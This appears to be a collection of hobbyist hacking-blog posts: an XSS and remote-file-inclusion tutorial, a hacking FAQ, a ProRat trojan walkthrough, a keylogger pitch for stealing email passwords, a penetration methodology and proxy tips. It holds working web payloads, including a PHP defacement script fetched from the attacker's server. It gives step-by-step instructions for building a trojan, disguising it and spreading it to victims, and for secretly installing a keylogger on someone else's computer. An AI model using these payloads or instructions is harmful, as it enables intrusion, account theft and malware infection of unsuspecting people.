This vulnerability allows for an attacker’s input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)
Example Vulnerable Code – search.php (PHP)

PHP Code:

<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as “<font color=red>XSS</font>”. If the site is vulnerable to XSS, you will see something like this: XSS, else, it’s not vulnerable.
[b]Example Exploit Code (Redirect)

Quote:Because we’re mean, we want to redirect the slave to goatse (don’t look that up if you don’t know what it is) by tricking them into clicking on a link pointed to “search.php?search=<script>window.location=’http://goatse.cz/’</script>”. This will output “You searched for <script>window.location=’http://goatse.cz/’</script>. There were no results found” (HTML) and assuming the target’s browser supports JS (JavaScript) which all modern browsers do unless the setting is turned off, it will redirect them to goatse.

This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code – index.php (PHP)
Testing Inputs For Vulnerability
Try visiting “index.php?p=http://www.google.com/”; if you see Google, it is vulnerable to RFI and consequently LFI. If you don’t it’s not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing “index.php?p=/etc/passwd”; if you see the passwd file, it’s vulnerable to LFI; else, it’s not vulnerable to RFI or LFI.
Example Exploit
Let’s say the target is vulnerable to RFI and we upload the following PHP code to our server

PHP Code:

<?php
unlink("index.php");
system("echo Hacked > index.php");
?>

and then we view “index.php?p=http://our.site.com/malicious.php” then our malicious code will be run on their server, and by doing so, their site will simply say ‘Hacked’ now.
Conclusion
Tutorial inspired by: the avoidance of homework. Now that you read all that, get info.

Hacking FAQs

I get a lot of emails about hacking. It’s hard for me to answer each and every question which is asked more frequently. So here I have compiled some of the Most Frequently Asked Questions (FAQs) about Hacking. Hope it helps. Don’t forget to pass your comments.
What is Hacking?
Who is a Hacker?
What is The Hacker Terminology?
How Do I Hack?
What do I need to be able to hack?
How Hackers Work?
What is The Hacker Toolbox?
How do I secure my computer from being Hacked?
Famous Hackers
What is Hacking?
Computer hacking is the practice of modifying computer hardware and software to accomplish a goal outside of the creator’s original purpose. Hacking is the art of exploiting the flaws/loopholes in a software/module. Since the word “hack” has long been used to describe someone who is incompetent at his/her profession, some hackers claim this term is offensive and fails to give appropriate recognition to their skills.
Who is a Hacker?
Most people think that hackers are computer criminals. They fail to recognize the fact that criminals and hackers are two totally different things. Media is responsible for this. Hackers in reality are actually good and extremely intelligent people who by using their knowledge in a constructive manner help organizations, companies, government, etc. to secure documents and secret information on the internet. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren’t intended to do.
What is The Hacker Terminology?
As hacker terminology changes a lot over time some of the terms here may not still be relevant when they are being used. Despite this, most of the terminology will stay and only change slightly if it does; there is more new terminology than there is editing old terminology.
Hacker: A person who modifies something to perform in a way that was different than it was made to do. Not just to do with computer hacking, but in this case it is.
Cracker: Crackers are people who break into a computer system for an offensive purpose, for example defacement. A cracker is still a hacker.
Ethical Hacker: People who hack into systems for defensive purposes, often people hired by companies to pen-test their network.
White hat hacker: Somebody with defensive security intentions, similar to an ethical hacker. White hat hackers existed before ethical hackers.
Black hat hacker: A hacker with malicious or offensive intentions
Gray hat hacker: A combination between white and black hat hackers. We typically say that a gray hat is a white hat by day and a black hat by night. White hats are technically gray hats because black hat hackers can use the tools that white hats use as well. The chances are all white hats have done some black hat hacking at one point because they must have learned to use the tools that they are using ethically to hack a system otherwise they would have no hacking experience.
Script Kiddie: A person who uses tools with no contribution to the hacking community, kiddies don’t know how to create their own tools or use advanced tools and constantly use the same tools to hack a server or system, often not effectively. To some degree all hackers are script kiddies, but a good hacker has the ability to make intelligent decisions such as determining false positives from virus scans.
Hacktivism: Hactivists perform Hacktivism. Hacktivism is a combination between two works: hacker and activist. Somebody who hacks for a cause; maybe they are environmentalists hacking against companies that they think are destroying the environment
Vulnerability: A weakness that could lead to compromised security. It may be discovered accidentally. Somebody may write a script to exploit this vulnerability.
Exploit: A defined method of hacking vulnerability.
0Day: An unreported exploit, typically requires some scripting or coding knowledge, this could be virus, malware or spyware. This can be worth a lot of money if sold to a company. Although extremely risky to sell to companies due to the fact that it is illegal.
War Drivers: People who take some kind of portable device, for example a USB drive or a laptop and just go to a public location. Then they pick up a wireless signal and possibly see what software it is running and maybe find exploits for that software, but war drivers are not limited to this. They often just use this for free internet in the case they don’t have access to it themselves.
Black Box Attacks: Security testing with no knowledge of the network infrastructure, for example attacking a company from the internet.
White Box Attacks: Security testing with complete knowledge of the network infrastructure.
Gray Box Attacks: Internal testing from the perspective of a generic user inside the infrastructure, this user would not be an admin but just a normal user.
Reckless Admins: An admin who is careless, for example using the same password for all of the different things in the network. A reckless admin may not use the latest patches even though they are readily available.

How Do I Hack

There is no easy way how to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies which will teach you a lot. The best way to start hacking is to teach yourself !!!

What do I need to be able to hack?

Firstly you need to understand how your computers operating system works, networks and protocols works, security settings and general PC knowledge. After you understand how it works you need hacking tools which helps you to hack.

How Hackers Work

Thanks to the media, the word “hacker” has gotten a bad reputation. The word summons up thoughts of malicious computer users finding new ways to harass people, defraud corporations, steal information and maybe even destroy the economy or start a war by infiltrating military computer systems. While there’s no denying that there are hackers out there with bad intentions, they make up only a small percentage of the hacker community.
The term computer hacker first showed up in the mid-1960s. A hacker was a programmer — someone who hacked out computer code. Hackers were visionaries who could see new ways to use computers, creating programs that no one else could conceive. They were the pioneers of the computer industry, building everything from small applications to operating systems. In this sense, people like Bill Gates, Steve Jobs and Steve Wozniak were all hackers — they saw the potential of what computers could do and created ways to achieve that potential.
A unifying trait among these hackers was a strong sense of curiosity, sometimes bordering on obsession. These hackers prided themselves on not only their ability to create new programs, but also to learn how other programs and systems worked. When a program had a bug — a section of bad code that prevented the program from working properly — hackers would often create and distribute small sections of code called patches to fix the problem. Some managed to land a job that leveraged their skills, getting paid for what they’d happily do for free.
As computers evolved, computer engineers began to network individual machines together into a system. Soon, the term hacker had a new meaning — a person using computers to explore a network to which he or she didn’t belong. Usually hackers didn’t have any malicious intent. They just wanted to know how computer networks worked and saw any barrier between them and that knowledge as a challenge.
In fact, that’s still the case today. While there are plenty of stories about malicious hackers sabotaging computer systems, infiltrating networks and spreading computer viruses, most hackers are just curious — they want to know all the intricacies of the computer world. Some use their knowledge to help corporations and governments construct better security measures. Others might use their skills for more unethical endeavors.
Here, we’ll explore common techniques hackers use to infiltrate systems. We’ll examine hacker culture and the various kinds of hackers as well as learn about famous hackers, some of whom have run afoul of the law.

What is The Hacker Toolbox?

The main resource hackers rely upon, apart from their own ingenuity, is computer code. While there is a large community of hackers on the Internet, only a relatively small number of hackers actually program code. Many hackers seek out and download code written by other people. There are thousands of different programs hackers use to explore computers and networks. These programs give hackers a lot of power over innocent users and organizations — once a skilled hacker knows how a system works, he can design programs that exploit it.
Malicious hackers use programs to:
Log keystrokes: Some programs allow hackers to review every keystroke a computer user makes. Once installed on a victim’s computer, the programs record each keystroke, giving the hacker everything he needs to infiltrate a system or even steal someone’s identity.
Hack passwords: There are many ways to hack someone’s password, from educated guesses to simple algorithms that generate combinations of letters, numbers and symbols. The trial and error method of hacking passwords is called a brute force attack, meaning the hacker tries to generate every possible combination to gain access. Another way to hack passwords is to use a dictionary attack, a program that inserts common words into password fields.
Infect a computer or system with a virus: Computer viruses are programs designed to duplicate themselves and cause problems ranging from crashing a computer to wiping out everything on a system’s hard drive. A hacker might install a virus by infiltrating a system, but it’s much more common for hackers to create simple viruses and send them out to potential victims via email, instant messages, Web sites with downloadable content or peer-to-peer networks.
Gain backdoor access: Similar to hacking passwords, some hackers create programs that search for unprotected pathways into network systems and computers. In the early days of the Internet, many computer systems had limited security, making it possible for a hacker to find a pathway into the system without a username or password. Another way a hacker might gain backdoor access is to infect a computer or system with a Trojan horse.
Create zombie computers: A zombie computer, or bot, is a computer that a hacker can use to send spam or commit Distributed Denial of Service (DDoS) attacks. After a victim executes seemingly innocent code, a connection opens between his computer and the hacker’s system. The hacker can secretly control the victim’s computer, using it to commit crimes or spread spam.
Spy on e-mail: Hackers have created code that lets them intercept and read e-mail messages — the Internet’s equivalent to wiretapping. Today, most e-mail programs use encryption formulas so complex that even if a hacker intercepts the message, he won’t be able to read it.
How do I secure my computer from being Hacked?
Having a basic knowledge of computer security and related topics such as Virus, Trojans, spyware, phishing etc. is more than enough to secure your computer. Install a good antivirus and a firewall.

Famous Hackers

Steve Jobs and Steve Wozniak, founders of Apple Computers, are both hackers. Some of their early exploits even resemble the questionable activities of some malicious hackers. However, both Jobs and Wozniak outgrew their malicious behavior and began concentrating on creating computer hardware and software. Their efforts helped usher in the age of the personal computer — before Apple, computer systems remained the property of large corporations, too expensive and cumbersome for average consumers.
Linus Torvalds, creator of Linux, is another famous honest hacker. His open source operating system is very popular with other hackers. He has helped promote the concept of open source software, showing that when you open information up to everyone, you can reap amazing benefits.
Richard Stallman, also known as “rms”, founded the GNU Project, a free operating system. He promotes the concept of free software and computer access. He works with organizations like the Free Software Foundation and opposes policies like Digital Rights Management.
On the other end of the spectrum are the black hats of the hacking world. At the age of 16, Jonathan James became the first juvenile hacker to get sent to prison. He committed computer intrusions on some very high-profile victims, including NASA and a Defense Threat Reduction Agency server. Online, Jonathan used the nickname (called a handle) “c0mrade.” Originally sentenced to house arrest, James was sent to prison when he violated parole.
Greg Finley/Getty Images
Hacker Kevin Mitnick, newly released from the Federal Correctional Institution in Lompoc, California.
Kevin Mitnick gained notoriety in the 1980s as a hacker who allegedly broke into the North American Aerospace Defense Command (NORAD) when he was 17 years old. Mitnick’s reputation seemed to grow with every retelling of his exploits, eventually leading to the rumor that Mitnick had made the FBI’s Most Wanted list. In reality, Mitnick was arrested several times for hacking into secure systems, usually to gain access to powerful computer software.
Kevin Poulsen, or Dark Dante, specialized in hacking phone systems. He’s famous for hacking the phones of a radio station called KIIS-FM. Poulsen’s hack allowed only calls originating from his house to make it through to the station, allowing him to win in various radio contests. Since then, he has turned over a new leaf, and now he’s famous for being a senior editor at Wired magazine.
Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws, exploit the flaws to hack into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant — his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.
It’s likely that there are thousands of hackers active online today, but an accurate count is impossible. Many hackers don’t really know what they are doing — they’re just using dangerous tools they don’t completely understand. Others know what they’re doing so well that they can slip in and out of systems without anyone ever knowing.

How to hack email account password(Using prorat):-

1. First of all download Prorat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be “pro”.

2. Open up the program. You should see the following:

3. Next we will create the ProRat Trojan server. Click on the “Create” button in the bottom. Choose “Create ProRat Server”.

4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.
5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.
Here is a quick overview of what they mean and which should be checked:
6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.

7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.

8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.
9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name “binded_server” will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.
Very important: Do not open the “binded_server” file on your system.
10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as “server.exe”, because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.
11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.
Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.
12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim’s computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.
13. The image below shows the message that the victim would get on his screen if the hacker chose to message him/her.
14. Below is an image of the victims task bar after the hacker clicks on Hide Start Button.
15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.
As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.
ufffff!!!!  Now plz do comment….

Sitemeter Hack – Hide Visual Tracker (Counter)

Sitemeter, one of the best traffic counter for websites/blogs, it shows online users, Referrals (From where people coming to your site), country locations, browser etc etc.. all in detail.
This counter is visible to all visitors.
Invisible Counters (Tracker) is available for Premium Accounts Only…!
But you can easily hack to hide it.
Its just few setting changes which will work fine.
1) Login into your sitemeter account.
2) Go to ‘Manager’ from top menu.
3) Go to ‘Meter Style’ option from left hand menu.
4) Select 2nd last meter style (Counter, which shows simple numbers).
5) Now in “DIGIT COLOR” select ‘Transparent’, Similarly in “BACKGROUND COLOR” select ‘Transparent’.
6) DONE.
Now your sitemeter counter is invisible from normal eyes in your site
Place it anywhere in your website/blog, and track your traffic, users.
Enjoy…..!

Website Hacking through SCRATCH

I’m going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding & an overview about professional penetration testing in a black box (attacker) point of view. It is designed to give you an idea on how an attacker can break into your system, what I am gonna say will increase your awareness & will open the door for you to go out & educate yourself easily. I gathered this information from various sources and tutorials, i have changed many things, clarified many parts, given some references, and put a lot of information together. I’m still a learner & on the way to my goal. However, this won’t prevent me from teaching others what i have learned so far & don’t worry, i’m not going to provide you with any info that i’m not sure about yet. It is not the best tutorial out there, but at least it is a good starter. I will speak in a hacker (attacker or blackbox) point of view. I write this tutorial for educational purposes only.
Before you hack a system, you must decide what your goal is. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the ‘root’ access, screwing up the system by formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc … ? The point is that you have to decide what the goal is first.
The most common goals are:
1. breaking into the system & taking the admin privileges.
2. gaining sensitive data, such as credit cards, identification theft, etc.
You should have all of your tools ready before you start taking the steps of hacking. There is a Unix version called backtrack. It is an Operating System that comes with various sets of security tools that will help you hack systems (penetration tests).
You should set the steps (methodology) that you plan to take in your journey before you do anything else. There is a common methodology followed
by hackers, i will mention it below. However, you can create your own methodology if you know what you are doing.
Common steps to be taken for hacking a system:
1. Reconnaissance (footprinting).
2. Scanning.
3. Ports & Services Enumeration.
4. Vulnerability Assessment.
5. Vulnerability Exploitation.
6. Penetration and Access.
7. Privilege Escalation & owning the box.
8. Erase tracks.
9. Maintaining access.
The above methodology can change based on your goals. Feel free m8!
Before you break into a system, you have to collect as much info as you can on the system and target. You have to study your target well before you hack. This step is called Reconnaissance. Reconnaissance is achieved by using techniques & tools that are undetectable by the target. You are gathering your target’s info that is publicly published, e.g. browse your target’s website & if they are looking for an SQL employee and Windows server admin, then you get a hint that they are running Windows Server & do SQL’s, this is called a “passive” action. Lets see an example of active action! Example of active action: call the company to obtain some info, visit the company, email employees to get some info, go to the target’s website & read its source code. In other words, passive action means you gather info in a non-intrusive manner. Active action is a step further, such as talking to the company as if you are a customer, things like that. It is not really important to know what action is passive & what is active, the main goal here to gather info! Simple huh? Good, let me go deeper little bit.
In passive reconnaissance, there is a 0% chance of getting caught , as you only target publicly available info to give you the feel on what your target looks like. The type of info you can gather through Passive Recon. are, names, phones numbers, location addresses, partner networks, and much more. This can aid you when you want to do some social engineering! Hence, sometimes you can get some non-public info that’s revealed when you do passive reconnaissance. There are several tools helps you to do passive reconnaissance, such as whois (who is). Whois helps you obtain extensive info, such as names, domains of the target, etc. Other great tools are, Sam Spade, domaintools, and google(can reveal lots of target subdomians & many more).
Active reconnaissance goes beyond the passive nature, such as communicating with the target without being caught, such as scanning. Anything not discovered in IDS(Intrusion Detection System) is considered active. You have to think of ways to extract info of the company in a normal way, public by going a little bit deeper than passive recon. e.g. you can go to the physical location, do some social engineering, email staff, communicate with employees based on the info you’ve gotten on your passive recons. Things like that!
Example of some techniques for active reconnaissance, such as banner grabbing, view company’s public website source code and directory structure, social engineering, shoulder surfing, etc.
What the heck is banner grabbing?
You let the server send you a block of information that tells you OS version of your target system & various association with it
Banner tells OS version and various association. Anything listening on a “port” can determine the operating system (OS) “the port” is running on, this called fingerprinting. In other words, fingerprinting is the process of determining the operating system (OS) or applications used by a remote target.
Learn more about banner grabbing:
http://www.net-square.com/httprint/httprint_paper.html
Can you give a brief example of Social Engineering?
For example, you try to find out where IT admin goes after business hours, then start to go to the place he goes & build a relationship , start making a friend relationship to extract more info slowly but surely, things like that! you know what i mean.
[color]What is shoulder surfing?[/color]
Simply, stand behind a person’s shoulder and see what the guy is doing & typing on the keyboard. This can happen in a wireless network area where everyone is using a laptop in public areas.
In summary, reconnaissance is one of the most important steps in hacking. The main concept is to gather all the info that is publicly available or easily obtainable. Info that we gather will help us in social engineering and research purposes which will lead you to very critical info about the system. It starts by obtaining names, phones, emails, IP range, domain structure, and so on.
let me show you how banner grabbing is done, telnet into your target server on port 80 as the following, go to command line or terminal and type
telnet xx.xxx.xxx.xxx 80
Now the connection is established, that stupid server thinks you are a web browser connected to it, it waits you to enter commands so the server can you give you info about your request. In this situation, you have to write a command that says “Hey you web server, give me content of such and such website”. However, we do not really want to visit the website through telnet, do you? You can just go to web browser & request the website from there. Our purpose here is to freak the server out enough, so it spits back a code that says, hey! this doesn’t work but here is some info that might help you do some trouble shooting. This technique allows you to fingerprint various components of the target system.
Note: instead of telnet xxx.xx.xxx.xx 80, you can do nc xxx.xx.xxx.xxx 80! It’s the same thing … nc stands for netcat … xx.xxx.xx.xxx represents the IP address of the target system.
After you do telnet xxx.xx.xxx.xxx 80, the remote sever will wait you to enter a command. Type this:
HEAD / HTTP/1.0
Then you will get a reply looks similar to:-
HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 02:53:29 GMT
Server: Apache/1.3.3 (Unix) (Red Hat/Linux)
Last-Modified: Sun, 02 Jan 2011 11:18:14 GMT
ETag: “1813-49b-361b4df6″
Accept-Ranges: bytes
Content-Length: 1179
Connection: close
Content-Type: text/html
So the header response brought back some important info that says, the server runs: Apache/1.3.23 in UNIX OS for Red Hat distribution of Linux.
OR you might get header that looks similar to the following:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Expires: Wed, 29 Dec 2010 01:41:33 GMT
Date: Fri, 31 Dec 2010 01:41:33 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 28 May 2003 15:32:21 GMT
ETag: “b0aac0542e25c31:89d”
Content-Length: 7369
It means, the server runs: Microsoft-IIS/5.0 in Win 2000 or Win 2003 (we don’t the Windows version yet).
OR you might get header that looks similar to the following:
Date: Sta, 01 Jan 2011 02:18:46 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.8 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b
Last-Modified: Sun, 02 Jan 2011 23:34:28 GMT
ETag: “c9865b-d91-48769c84″
Accept-Ranges: bytes
Content-Length: 3473
Connection: close
Content-Type: text/html
It means, the server runs: Apache/1.3.41 in UNIX box, running PHP/4.4.8
Ok, you get it now?
lets say our target got the following version: the server runs: Apache/1.3.41 in UNIX box, running PHP/4.4.8
At this point if you know any vulnerabilities for this particular OS or this particular Apache or PHP. You can start the exploitation process …
Another example, use program called sam-spade which gives you alot of info about your target. The target does not know actually what we are doing against their server, since they haven’t seen anything been triggered by IDS or Firewall.
*What is the difference between IDS & Firewall?
An IDS (Intrusion Detection System) may only detect and warn you of a violation of your privacy. Although most block major attacks, some probes or other attacks may just be noted and allowed through. There’s also an evolution of the IDS called an IPS (Intrusion Prevention System) that watches for the same things an IDS does, but instead of just alerting, it blocks the traffic.
A good firewall will block almost all attacks unless specified otherwise or designed otherwise. The only problem is, the firewall might not warn you of the attacks and may just block them.
It may be a good idea to have both an IDS and a Firewall, because the IDS will warn you and then the firewall will block the attack. Over the years, firewalls gottten more complex and added more features. One of these features is actually IDS – today you can have a firewall that already has IDS (Firewall/IDS’s are combined into one internet security program).

Increase the Speed of your Internet connection- Broadband Hack

Results of Increased download speed after tweaking the system
The Speed I was getting before installing the TCP/IP optimizer

The two things we need to notice are download speed and upload speed.
Download speed: 0.46
Upload speed : 0.24
The speed I am getting after installing TCP/IP optimizer

Download speed: 1.00
Upload speed : 0.44
The result shows now I have the double speed compared to the previous time.
How it is possible? Anyway I am getting the same connection from the ISP. So the change is not at the ISP end. It is definetly happen at my computer end.
The possible reasons are:
1. It changes the Windows registry value for the optimum performance.
2. TCP Optimizer works by tuning up all the important TCP/IP parameters (MTU, RWIN,QoS,ToS/Diffserv prioritization). It optimizes the TCP/IP suit for better MTU and so the stateful connections(eg:video streamings, downloads) will be faster.
To download TCP/IP optimizer click on the link below.
http://www.speedguide.net/downloads.php

Email Hacking Software

Password Hacking Software, Email Hacking Software, Yahoo Password Hacking Software, Hotmail Password Hacking Software…

Don’t get fooled by these words. Learn the Real of of hacking email passwords. Identify which Hacking Softwares work and which doesn’t. Most of us are very curious about a software that can hack email passwords. In fact most of the searches about hacking contain the keyword email hacking software or password hacking software. But is it really possible to hack an email using a software? Does there exist a software to hack email passwords? In this post I’ll explain every possible information that you need to know about an email hacking software.

Email Hacking Software – Explained

THINGS YOU SHOULD KNOW BEFORE PROCEEDING
Many sites on the internet claim to sell softwares/programs to hack email passwords. I know most of you are aware of this. These sites also boast that their software can hack email passwords with in minutes. Some sites also claim that they can hack any one’s password for money (say $100). Never believe these sites. They are all scam! I can dare challenge anyone who claims to hack an email, using a software program. In fact when I was a newbie in the field of Hacking, I have spent many sleepless nights in search of an Email hacking software. Finally I ended up only with frustration and nothing more than that. I don’t want my readers to commit the same mistake which I did. So, never believe those scam sites and empty your pockets by spending on useless softwares.
SO, HOW CAN I HACK AN EMAIL PASSWORD ?
The story doesn’t end up here. It is still possible to hack an email password and several opportunities to do that are still open for you. In this post I’ll discuss the easiest way to hack an email password. For this you need not be an expert hacker or have any knowledge of hacking. Yes believe me, it’s possible. All you have to do is just use Keyloggers. Here are some of the Frequently Asked Questions about keyloggers.
What is a keylogger ?
A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an email account.
A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. Even though keylogger software is not meant for hacking passwords, you can use them to hack email passwords.
Where is the keylogger program available ?
A keylogger program is widely available on the internet. The of the best one is given below
SniperSpy
Sniperspy can be used either on a Local or Remote computer.
I don’t have physical access to the victim’s computer, can I still hack the password ?
Yes, you can still hack the email using a keylogger software. All you have to do is, just use a keylogger software that has Remote Installation feature. SniperSpy support Remote Installation.
You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the program containing, it will automatically get installed without his knowledge and start recording every activity on his computer. These activities are sent to you by the keylogger software via email or FTP.
Why Sniperspy is the best ?
These are some of the advantages of SniperSpy over any other software.
1. Sniper Spy is more reliable than any other keylogger since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.
2. SniperSpy offers excellent support.
3. SniperSpy has got recognition from media such as CNN, BBC, CBS, Digit etc. Hence it is more reputed and trustworthy.

Hide IP Address – Real ways to hide your IP

Here in this post I will try to give you every possible information to hide the IP address.
One of the most frequently asked questions by the internet users is How To Hide IP Address ?. Many times it becomes necessary to hide the real IP address for the sake of privacy. For this, I have tried many softwares, proxy servers and many such tools that guaranteed to hide my IP address.But still none of them worked for me. I think most of you have the same experience. Are you fed up with these dummy softwares that fails to hide the real IP address? Then is there any working way to hide the IP address?

YES, you can definitely hide your IP
Now I’ll come to the heart of the post, which contains the answer to your curious question How to Hide the IP address ? The only solution to hide your IP address is by using a Proxy Server. But Wait! The story doesn’t end here. Even though proxy servers are the only way to hide your IP address, there are several ways of connecting your PC to the proxy server. Before setting up the connection with the proxy servers you must know some information about different types of proxy servers and their uses.
1. Transparent Proxy Server
This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used to speedup the web browsing since thay have a very good ability to cache websites. But they do not conceal the IP of it’s users. It is widely known as transparent proxy because it will expose your real IP address to the web. This type of proxy server does not hide your IP address.
2. Anonymous Proxy Server
This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.
3. Distorting Proxy Server
This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.
4. High Anonymity Proxy Server (Elite Proxy)
This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.So this is the best way to mask your IP.
Which Proxy Server is the best to Hide My IP ?
I know, you can answer this question better than me.Obviously High Anonymity Proxy or Elite Proxy is the best to hide your IP. But it’s not easy to get a list of working elite proxies. If you search the Google, you will definitely get tons of proxy list. You’ll get a list of proxies in the following format

IP:Port Number

Eg: 221.90.45.67:8080 (221.90.45.67 is the IP of the proxy server and 8080 is the port number)
But most of them don’t work. Here are some of the problems/risks associated with using free proxies that are available on the internet.

• Most of them do not work since the proxy servers frequently changes it’s IP/Port number.
• Even if you find a working proxy server it may be too slow.
• Your privacy is not guaranteed since all your traffic is routed through the proxy server.
• The administrators of the proxy servers may steal your valuable information such as passwords, SSN (Social security number), Credit Card details etc.

So with all these being the risks then how to find a working, fast ,highly anonymous and secured Proxy servers?
Now I will give a list of softwares that will really hide your IP address. I have tried many such softwares and have found only few of them working perfectly. Here is a list of working IP Hiding softwares that you can try. I have listed them in the order of their popularity
1. Hide The IP
Let’s you choose the country, type and speed of the proxy. Not so popular but personally I recommend this to the users.
2. Hide My IP
3. Hide IP NG
You can get more informations about these products on their respective homepages.
How to ensure that the IP is hidden ?
Before you hide your IP you can check your real IP by visiting the following site.
WhatIsMyIPAddress.Com
Once you get your real IP, switch on your IP hiding software. Now once again visit the above site and check your IP address. If you see a new IP then this means that your software is doing the right job. Also the above site(Whatismyipaddress.com) is capable of detecting many proxies. If you see the words such as “suspected proxy server or network sharing device” or similar words then it means that the proxy you are using is not an Elite Proxy.
One Final Word before you leave! Even though Elite proxies are almost undetectable this doesn’t mean that you can escape from online crimes by hiding your IP. There are many proxy detecting services available which detect almost any proxy. So if you involve in any cyber crimes then you will definitely be behind the bars. Using proxy will not help you in this case.
One More thing, it is unsafe to use proxy during e-commerce transactions such as Online banking, Online Credit Card payment etc. So please avoid proxies during these circumstances.